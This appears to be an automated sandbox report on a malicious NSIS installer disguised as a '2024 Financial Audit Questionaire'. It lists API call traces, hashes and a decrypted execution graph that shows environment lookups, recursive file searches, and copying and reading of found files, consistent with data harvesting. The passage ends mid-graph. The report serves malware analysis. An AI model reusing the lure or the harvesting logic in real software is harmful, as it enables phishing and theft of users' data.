                                                                                                    • Instruction ID: 99b29286c29c4417609fc152e7ab7d49c37a34cf298751ff58d773eaaaf64e16
                                                                                                    • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                                    • Instruction Fuzzy Hash: 0501483215020AEADB218F16ED08E9B3BA8EF44351F00443AF944D2220E335DA60CBE5
                                                                                                    APIs
                                                                                                    • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,?,00405AF6,C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,?,?,76232EE0,00405834,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe"), ref: 00405A90
                                                                                                    • CharNextW.USER32(00000000), ref: 00405A95
                                                                                                    • CharNextW.USER32(00000000), ref: 00405AAD
                                                                                                    Strings
                                                                                                    • C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp, xrefs: 00405A83
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharNext
                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp
                                                                                                    • API String ID: 3213498283-1144430446
                                                                                                    • Opcode ID: 4650fa990997f8469f94077bac91aaa1730da3b5ce12b11342ea2826d17ce8e9
                                                                                                    • Instruction ID: 5ad67665fffd931dad9daf24cd7e721830b1e1cd98268fde7792f953d01aa38a
                                                                                                    • Opcode Fuzzy Hash: 4650fa990997f8469f94077bac91aaa1730da3b5ce12b11342ea2826d17ce8e9
                                                                                                    • Instruction Fuzzy Hash: 60F09611B40A1196DF3176544CD5A7776B8EB54350F14823BE702B71C1D3F84C818FEA
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 004059DD
                                                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 004059E7
                                                                                                    • lstrcatW.KERNEL32(?,00409014), ref: 004059F9
                                                                                                    Strings
                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004059D7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                    • API String ID: 2659869361-3936084776
                                                                                                    • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                    • Instruction ID: 7fac2ab44bb530718b2284b157b2a7f0092c6bde3eeb611d4a5a20073ea11bc0
                                                                                                    • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                    • Instruction Fuzzy Hash: AAD05E61101921AAC21267458C00D9F629CEE86340340042AF101B30A1C77C1D428BFE
                                                                                                    APIs
                                                                                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                                    • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                                    • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                      • Part of subcall function 00405ED3: wsprintfW.USER32 ref: 00405EE0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 1404258612-0
                                                                                                    • Opcode ID: d0aace0066db3accf962e5b6be056e4656163b19ba1ee418162f5e9f181ae1bd
                                                                                                    • Instruction ID: be65c1d2588467b23a66eae505f80d4d78c913a93c6f7397512a76e1284fe209
                                                                                                    • Opcode Fuzzy Hash: d0aace0066db3accf962e5b6be056e4656163b19ba1ee418162f5e9f181ae1bd
                                                                                                    • Instruction Fuzzy Hash: 2E113A71A00109BFDB00DFA5C945DAEBBB9EF48344F20447AF501F62A1D7749E50DB69
                                                                                                    APIs
                                                                                                      • Part of subcall function 00405F8C: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F99
                                                                                                      • Part of subcall function 00405A82: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,?,00405AF6,C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,?,?,76232EE0,00405834,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe"), ref: 00405A90
                                                                                                      • Part of subcall function 00405A82: CharNextW.USER32(00000000), ref: 00405A95
                                                                                                      • Part of subcall function 00405A82: CharNextW.USER32(00000000), ref: 00405AAD
                                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,?,?,76232EE0,00405834,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe"), ref: 00405B38
                                                                                                    • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp,?,?,76232EE0,00405834,?,C:\Users\user\AppData\Local\Temp\,76232EE0), ref: 00405B48
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsdE3C5.tmp
                                                                                                    • API String ID: 3248276644-1144430446
                                                                                                    • Opcode ID: d117d0ccab4911199c69acc1ac59bea3cdceced1d455b0aaf4c9d7a527f16456
                                                                                                    • Instruction ID: befbdd5a087c2980586ea2edfffbf9f3f516deffcd0f82c81bc74a8a64b8095a
                                                                                                    • Opcode Fuzzy Hash: d117d0ccab4911199c69acc1ac59bea3cdceced1d455b0aaf4c9d7a527f16456
                                                                                                    • Instruction Fuzzy Hash: 97F0D125208D5259D622323A1C49AAF3954CF82324B59063FB850B22D1DA3CA9439DBE
                                                                                                    APIs
                                                                                                    • IsWindowVisible.USER32(?), ref: 004051D7
                                                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 00405228
                                                                                                      • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                    • String ID:
                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                    • Opcode ID: 095d3e8979228cc473652e7f56876996a988928912ea754460f36dcc48231124
                                                                                                    • Instruction ID: 3506bd8619de0691e6240ff1aea28b3f5ea6f30d487ea60658fc819ef8ae1edd
                                                                                                    • Opcode Fuzzy Hash: 095d3e8979228cc473652e7f56876996a988928912ea754460f36dcc48231124
                                                                                                    • Instruction Fuzzy Hash: 02017171540609ABDF205F91ED80AAB3A25EBA4314F50403AFA007A1E1C77A9C929F6D
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76232EE0,00403861,76233420,0040366C,?), ref: 004038A4
                                                                                                    • GlobalFree.KERNEL32(?), ref: 004038AB
                                                                                                    Strings
                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 0040389C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Free$GlobalLibrary
                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                    • API String ID: 1100898210-3936084776
                                                                                                    • Opcode ID: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                                                                    • Instruction ID: 78adfbc6f23a2b3c20b59446217b09faef23a1eee4c9d5cf742f1d2697954a66
                                                                                                    • Opcode Fuzzy Hash: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                                                                    • Instruction Fuzzy Hash: 2FE08C339041205BC621AF25AC08B1AB7A86F89B32F0581B6F9807B2A183746C624BD9
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe,C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe,80000000,00000003), ref: 00405A29
                                                                                                    • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe,C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe,80000000,00000003), ref: 00405A39
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharPrevlstrlen
                                                                                                    • String ID: C:\Users\user\Desktop
                                                                                                    • API String ID: 2709904686-3125694417
                                                                                                    • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                    • Instruction ID: 70c70b289df7ad335b0e987d4c8d51b2e295f307612c2b5534f84bbf363d52d8
                                                                                                    • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                    • Instruction Fuzzy Hash: EFD05EA25019209BD322A704DC40D9FA7ACEF513007454866F401A31A0D3785D818EA9
                                                                                                    APIs
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                    • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2470562995.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2470483561.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2470605594.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2470633489.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_10000000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$Free$Alloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 1780285237-0
                                                                                                    • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                    • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                    • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                    • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                    APIs
                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B6D
                                                                                                    • lstrcmpiA.KERNEL32(00405D97,00000000), ref: 00405B85
                                                                                                    • CharNextA.USER32(00405D97,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B96
                                                                                                    • lstrlenA.KERNEL32(00405D97,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B9F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                    • String ID:
                                                                                                    • API String ID: 190613189-0
                                                                                                    • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                    • Instruction ID: 495cf0b23cfe7cb5471ae9193bfc392c37a901cc734ec181b4002dd8df2403ac
                                                                                                    • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                    • Instruction Fuzzy Hash: 56F0CD32604458AFC7129FA8CD00D9EBBB8EF06250B2140AAF801F7221D634FE019BA9

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:1.8%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:0.5%
                                                                                                    Total number of Nodes:214
                                                                                                    Total number of Limit Nodes:5
                                                                                                    execution_graph 8777 33561c5b 8778 33561c6b ___scrt_fastfail 8777->8778 8781 335612ee 8778->8781 8780 33561c87 8782 33561324 ___scrt_fastfail 8781->8782 8783 335613b7 GetEnvironmentVariableW 8782->8783 8807 335610f1 8783->8807 8786 335610f1 57 API calls 8787 33561465 8786->8787 8788 335610f1 57 API calls 8787->8788 8789 33561479 8788->8789 8790 335610f1 57 API calls 8789->8790 8791 3356148d 8790->8791 8792 335610f1 57 API calls 8791->8792 8793 335614a1 8792->8793 8794 335610f1 57 API calls 8793->8794 8795 335614b5 lstrlenW 8794->8795 8796 335614d9 lstrlenW 8795->8796 8797 335614d2 8795->8797 8798 335610f1 57 API calls 8796->8798 8797->8780 8799 33561501 lstrlenW lstrcatW 8798->8799 8800 335610f1 57 API calls 8799->8800 8801 33561539 lstrlenW lstrcatW 8800->8801 8802 335610f1 57 API calls 8801->8802 8803 3356156b lstrlenW lstrcatW 8802->8803 8804 335610f1 57 API calls 8803->8804 8805 3356159d lstrlenW lstrcatW 8804->8805 8806 335610f1 57 API calls 8805->8806 8806->8797 8808 33561118 ___scrt_fastfail 8807->8808 8809 33561129 lstrlenW 8808->8809 8820 33562c40 8809->8820 8812 33561177 lstrlenW FindFirstFileW 8814 335611a0 8812->8814 8815 335611e1 8812->8815 8813 33561168 lstrlenW 8813->8812 8816 335611c7 FindNextFileW 8814->8816 8817 335611aa 8814->8817 8815->8786 8816->8814 8819 335611da FindClose 8816->8819 8817->8816 8822 33561000 8817->8822 8819->8815 8821 33561148 lstrcatW lstrlenW 8820->8821 8821->8812 8821->8813 8823 33561022 ___scrt_fastfail 8822->8823 8824 335610af 8823->8824 8825 3356102f lstrcatW lstrlenW 8823->8825 8826 335610b5 lstrlenW 8824->8826 8837 335610ad 8824->8837 8827 3356105a lstrlenW 8825->8827 8828 3356106b lstrlenW 8825->8828 8853 33561e16 8826->8853 8827->8828 8839 33561e89 lstrlenW 8828->8839 8831 335610ca 8834 33561e89 5 API calls 8831->8834 8831->8837 8832 33561088 GetFileAttributesW 8833 3356109c 8832->8833 8832->8837 8833->8837 8845 3356173a 8833->8845 8836 335610df 8834->8836 8858 335611ea 8836->8858 8837->8817 8840 33562c40 ___scrt_fastfail 8839->8840 8841 33561ea7 lstrcatW lstrlenW 8840->8841 8842 33561ec2 8841->8842 8843 33561ed1 lstrcatW 8841->8843 8842->8843 8844 33561ec7 lstrlenW 8842->8844 8843->8832 8844->8843 8846 33561747 ___scrt_fastfail 8845->8846 8873 33561cca 8846->8873 8850 3356199f 8850->8837 8851 33561824 ___scrt_fastfail _strlen 8851->8850 8893 335615da 8851->8893 8854 33561e29 8853->8854 8857 33561e4c 8853->8857 8855 33561e2d lstrlenW 8854->8855 8854->8857 8856 33561e3f lstrlenW 8855->8856 8855->8857 8856->8857 8857->8831 8859 3356120e ___scrt_fastfail 8858->8859 8860 33561e89 5 API calls 8859->8860 8861 33561220 GetFileAttributesW 8860->8861 8862 33561246 8861->8862 8863 33561235 8861->8863 8864 33561e89 5 API calls 8862->8864 8863->8862 8865 3356173a 35 API calls 8863->8865 8866 33561258 8864->8866 8865->8862 8867 335610f1 56 API calls 8866->8867 8868 3356126d 8867->8868 8869 33561e89 5 API calls 8868->8869 8870 3356127f ___scrt_fastfail 8869->8870 8871 335610f1 56 API calls 8870->8871 8872 335612e6 8871->8872 8872->8837 8874 33561cf1 ___scrt_fastfail 8873->8874 8875 33561d0f CopyFileW CreateFileW 8874->8875 8876 33561d44 DeleteFileW 8875->8876 8877 33561d55 GetFileSize 8875->8877 8882 33561808 8876->8882 8878 33561ede 22 API calls 8877->8878 8879 33561d66 ReadFile 8878->8879 8880 33561d94 CloseHandle DeleteFileW 8879->8880 8881 33561d7d CloseHandle DeleteFileW 8879->8881 8880->8882 8881->8882 8882->8850 8883 33561ede 8882->8883 8885 3356222f 8883->8885 8886 3356224e 8885->8886 8889 33562250 8885->8889 8901 3356474f 8885->8901 8906 335647e5 8885->8906 8886->8851 8888 33562908 8890 335635d2 __CxxThrowException@8 RaiseException 8888->8890 8889->8888 8913 335635d2 8889->8913 8892 33562925 8890->8892 8892->8851 8894 3356160c _strcat _strlen 8893->8894 8895 3356163c lstrlenW 8894->8895 9001 33561c9d 8895->9001 8897 33561655 lstrcatW lstrlenW 8898 33561678 8897->8898 8899 3356167e lstrcatW 8898->8899 8900 33561693 ___scrt_fastfail 8898->8900 8899->8900 8900->8851 8916 33564793 8901->8916 8904 3356478f 8904->8885 8905 33564765 8922 33562ada 8905->8922 8912 